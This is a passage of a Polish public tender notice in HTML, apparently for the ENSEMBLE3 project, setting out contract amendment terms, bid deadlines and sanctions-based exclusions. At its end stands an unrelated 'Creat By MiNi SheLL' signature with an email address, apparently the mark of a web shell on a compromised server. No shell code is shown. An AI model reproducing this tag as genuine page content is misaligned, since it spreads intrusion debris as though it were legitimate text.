opisanych w pkt 10.5. SWZ. Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie,<br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia dla Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia stanowi Załącznik nr 7 do SWZ.<br/>Zgodnie z art. 118 ust. 1 ustawy Pzp, Wykonawca może polegać na zdolnościach technicznych lub zawodowych podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca w<br/>takiej sytuacji zobowiązany jest do udowodnienia Zamawiającemu, iż realizując zamówienie będzie dysponował<br/>niezbędnymi zasobami tych podmiotów, składając wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów. Zobowiązanie podmiotu powinno być złożone razem z dokumentem potwierdzającym umocowanie osoby/ osób<br/>podpisującej/ych przedmiotowe zobowiązanie.<br/>Zobowiązanie podmiotu udostępniającego zasoby ma potwierdzać, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w szczególności:<br/>zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia,<br/>w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących doświadczenia, zrealizuje usługę, Zamawiający oceni, czy udostępniane Wykonawcy<br/>przez podmioty udostępniające zasoby zdolności ekonomicznej lub finansowej, techniczne lub zawodowe, pozwalają na<br/>wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt 10.5. oraz zbada, czy<br/>nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ust. 1 pkt. 1) ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, Strony przewidują<br/>możliwość dokonania zmiany zawartej Umowy, jeżeli wystąpi co najmniej jedna z niżej wymienionych okoliczności:a. nastąpi zmiana Wysokości wynagrodzenia Wykonawcy, w następujących warunkach:<br/>i. w przypadku zmiany stawki podatku od towarów i usług,<br/>ii. w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z<br/>dnia 10 października 2002 r. (Dz.U. 2020 r. poz. 2207 ze zm.), o minimalnym wynagrodzeniu za pracę,<br/>iii. w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości<br/>stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>iv. w przypadku zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w<br/>ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>b. niezależnych od Stron Umowy związanych z koniecznością zmiany okresu realizacji Umowy,i, których przy dołożeniu<br/>należytej staranności Strony na dzień podpisania Umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa,<br/>które nastąpiły w czasie realizacji Umowy lub wystąpią zdarzenia związane z siłą wyższą,<br/>c. w sytuacji zmiany obowiązujących przepisów prawa, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści Umowy<br/>do aktualnego stanu prawnego,<br/>d. w wypadku zmian mających na celu polepszenie jakości świadczonych usług (bez możliwości zmiany ceny) lub obniżenia<br/>ceny za świadczone usługi,<br/>e. w przypadku zmiany Wykonawcy, Podwykonawcy lub rezygnacji z udziału Podwykonawcy przy realizacji przedmiotu<br/>Umowy. Jeżeli zmiana dotyczy Wykonawcy lub podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując<br/>spełnienie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy Podwykonawca<br/>wykaże spełnienie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia<br/>przez dotychczasowego Podwykonawcę, a w przypadku Wykonawcy dodatkowo, że nie podlega wykluczeniu z<br/>postępowania na warunkach określnych przez Zamawiającego w postępowaniu przetargowym,<br/>f. zmiana osób wchodzących w skład Zespół osób realizujących przedmiot umowy, wskazanych w załączniku nr 5 do<br/>Umowy, może nastąpić wyłącznie na osobę, która posiada kwalifikacje i doświadczenie nie niższe od tych, które były<br/>podstawą oceny warunków udziału w postępowaniu oraz kryteriów oceny ofert (uzyskanie nie mniejszej oceny),<br/>g. na podstawie ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem,<br/>przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (tj.<br/>Dz.U. z 2020 r. poz. 1842 ze zm.),<br/>i. w przypadku jeśli zmiany nie jest istotna w rozumieniu art. 454 ust. 2 ustawy Prawo zamówień publicznych.<br/>2. Strony umowy ustalają zgodnie, iż zmiana wysokości wynagrodzenia brutto za wykonanie usługi będącej przedmiotem<br/>umowy może podlegać zmianie maksymalnie o Wskaźniki cen towarów i usług konsumpcyjnych (CPI) z roku poprzedniego<br/>ogłoszonego przez Prezesa GUS w Monitorze Polskim. Zastosowanie klauzuli waloryzacyjnej może nastąpić dwukrotnie:<br/>pierwsza zmiana nie wcześniej niż po 1 stycznia 2023 r. i dotyczy przyszłych niezrealizowanych usług na rok 2023 i druga<br/>zmiana po dniu 1 stycznia 2024 r. i dotyczy przyszłych niezrealizowanych usług na rok 2024. Warunkiem dokonania<br/>powyższej zmiany wynagrodzenia za tę część przedmiotu umowy jest złożenie umotywowanego wniosku przez<br/>Wykonawcę.<br/>Szczegółowy zakres zmian zawarty jest we wzorze umowy. Ze względu na ograniczenie liczby znaków w głoszeniu, nie<br/>zawarto wszystkich w tym ogłoszeniu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">: https://platformazakupowa.pl/pn/ensemble3</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-10 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Wartość zamówienia w pkt 4.1.6 dotyczy wartości szacunkowej niniejszego ogłoszenia bez wartości zamówień<br/>podobnych. Wartość usług podobnych została określona w pkt 4.2.14.<br/>2. Zamawiający prowadzi postępowanie przy użyciu platformy zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/ensemble3<br/>Na stronie zamawiającego https://ensemble3.eu/public-procurement znajduje się również link do prowadzonego<br/>postępowania<br/>3.O udzielenie zamówienia mogą ubiegać się Wykonawcy niepodlegający wykluczeniu z powodu przesłanek, o których mowa w art. 109 ust. 1 pkt. 4, 5, 7, 8 i 10 ustawy Pzp oraz wynikających z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835): <br/>Zamawiajacy określił wymagania w pkt 10.2 SWZ oraz określił poniższy zakres nie ujęty wcześniej w ogłoszeniu<br/>f)	Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego; <br/>g)	Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego; <br/>h)	Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217 ze zm.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com